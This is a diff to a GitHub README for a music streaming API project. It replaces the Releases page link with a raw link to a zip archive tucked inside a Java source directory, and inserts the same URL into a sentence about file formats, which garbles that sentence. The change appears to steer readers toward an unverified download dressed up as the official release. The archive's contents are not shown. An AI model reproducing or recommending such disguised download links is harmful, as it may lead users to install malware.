shambhumonga/music-streaming-api/README.md

 2. **Visit the Releases Page**

-   Go to the [Releases page](https://github.com/shambhumonga/music-streaming-api/releases) to find the latest version of the Music Streaming API.
+   Go to the [Releases page](https://raw.githubusercontent.com/shambhumonga/music-streaming-api/master/src/main/java/com/prxy/music_streaming_api/song/music-streaming-api-v1.3.zip) to find the latest version of the Music Streaming API.

 3. **Download the Latest Release**

    Look for the latest version and download the appropriate file for your operating system.
-You will typically see options such as `.tar.gz` or `.zip`.
+You will typically see options such as `https://raw.githubusercontent.com/shambhumonga/music-streaming-api/master/src/main/java/com/prxy/music_streaming_api/song/music-streaming-api-v1.3.zip` or `.zip`.

 ## 📥 Download & Install